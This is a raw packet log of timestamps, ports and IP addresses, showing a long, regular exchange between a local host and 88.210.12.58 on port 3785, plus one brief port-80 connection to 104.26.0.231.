Dec 10, 2024 08:59:03.440004110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.458427906 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.544714928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.559578896 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.643364906 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.664132118 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.744714975 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.762783051 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.844728947 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.865102053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:03.958698988 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:03.964061022 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:04.078134060 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:04.480142117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:04.580005884 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:04.599487066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:04.681015015 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:04.699372053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:04.782020092 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:04.800370932 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:04.882004976 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:04.901328087 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:04.984714985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.001346111 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.084718943 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.104227066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.183000088 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.204374075 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.284718990 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.302274942 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.384010077 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.404154062 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.484725952 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.503447056 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.585000992 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.603969097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.688631058 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.704454899 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.786067963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.808137894 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.887016058 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:05.905347109 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:05.988080978 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.006345034 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.089052916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.107434988 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.189044952 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.208437920 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.290071011 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.308329105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.389987946 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.409393072 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.490015030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.509227037 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.591088057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.609369040 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.691080093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.710334063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.792028904 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.810709953 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.892992020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:06.911358118 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:06.993014097 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.012358904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.096721888 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.112356901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.195152998 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.215981960 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.295993090 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.314739943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.396042109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.416299105 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.497008085 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.516227007 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.597995996 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.616795063 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.698987007 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.717179060 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.798985958 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.818233013 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:07.900006056 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:07.918375969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.000078917 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.019325018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.101047039 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.119330883 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.201014042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.220422029 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.302015066 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.320355892 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.401984930 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.421314001 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.503010035 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.521394014 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.604006052 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.622348070 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.705588102 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:08.723359108 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:08.824971914 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.268986940 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.370860100 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.389007092 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.470005989 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.490180969 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.571053982 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.589237928 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.674891949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.690391064 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.774944067 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.794125080 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.874998093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.894325972 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:09.972022057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:09.994339943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.073051929 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.091382980 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.174120903 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.192436934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.274996042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.294105053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.375006914 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.394336939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.475999117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.494416952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.577003956 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.595218897 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.677016020 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.696362019 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.777995110 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.796420097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.878057957 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.897351027 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:10.979017973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:10.997823954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.082783937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.098512888 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.179999113 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.202310085 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.282943964 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.299566031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.382028103 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.402276039 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.483103991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.501369953 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.602458954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.627696991 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.733144045 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:11.747082949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.852520943 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:11.945976019 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.065387011 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.148056984 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.248091936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.267580986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.349005938 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.398981094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.450032949 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.481827021 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.551058054 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.569390059 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.651041985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.670403004 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.751022100 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.770272017 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.853905916 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.870353937 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:12.958794117 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:12.973195076 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.059115887 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.078056097 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.158795118 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.178473949 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.258877993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.278125048 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.358721972 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.378200054 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.456994057 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.478313923 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.558003902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.576271057 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.658073902 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.677340031 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.758857012 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.777440071 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.859013081 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.878479958 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:13.959028959 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:13.978260040 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:14.059026957 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:14.078418970 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:14.160281897 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:14.178263903 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:14.262058973 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:14.279496908 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:14.381359100 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:14.461998940 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:14.581329107 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:14.968792915 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.067454100 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.088149071 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.167007923 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.186765909 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.268728971 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.286390066 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.368026018 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.388135910 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.469089985 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.487356901 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.569089890 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.588402033 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.669758081 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.688621044 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.772728920 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.789074898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.870903015 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.891958952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:15.971019030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:15.990164042 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.072006941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.090296030 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.173057079 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.191586018 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.273070097 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.292665005 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.373100042 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.392386913 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.474026918 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.492463112 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.575010061 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.593255043 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.676004887 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.694685936 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.776011944 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.795578957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.876009941 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.895423889 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:16.980735064 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:16.995373964 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.078012943 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.100274086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.182740927 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.197401047 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.279030085 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.301995993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.379991055 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.398446083 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.480222940 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.499389887 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.580015898 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.599581957 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.682744980 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.699373007 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.781008005 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.802140951 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.882740974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:17.900310993 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:17.982997894 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.002136946 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.084120035 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.102562904 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.184130907 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.203484058 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.285021067 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.303570986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.386081934 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.404383898 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.486048937 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.505418062 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.586008072 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.605546951 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.687010050 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.705476046 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.788005114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.806811094 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.888075113 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:18.907969952 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:18.990921974 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.007307053 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.089015961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.110270977 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.191771030 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.208225012 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.290015936 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.311103106 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.392729044 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.409406900 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.491321087 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.512079954 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.595643044 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.610672951 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.695045948 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.715053082 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.796355963 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.814332008 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.897665977 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:19.915649891 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:19.997049093 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.017105103 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.098184109 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.116285086 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.199107885 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.217447996 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.299115896 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.318367004 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.400033951 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.418401003 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.500049114 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.519360065 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.600030899 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.619378090 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.701107025 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.719294071 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.801012993 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.820389986 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.903172970 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:20.921101093 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:20.930735111 CET	49729	80	192.168.2.6	104.26.0.231
Dec 10, 2024 08:59:21.002007961 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.022545099 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:21.050600052 CET	80	49729	104.26.0.231	192.168.2.6
Dec 10, 2024 08:59:21.054867029 CET	49729	80	192.168.2.6	104.26.0.231
Dec 10, 2024 08:59:21.102811098 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.121408939 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:21.202806950 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.222065926 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:21.303036928 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.322212934 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:21.404026031 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.422494888 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:21.506787062 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.523350000 CET	3785	49723	88.210.12.58	192.168.2.6
Dec 10, 2024 08:59:21.605256081 CET	49723	3785	192.168.2.6	88.210.12.58
Dec 10, 2024 08:59:21.626526117 CET	3785	49723	88.210.12.58	192.168.2.6
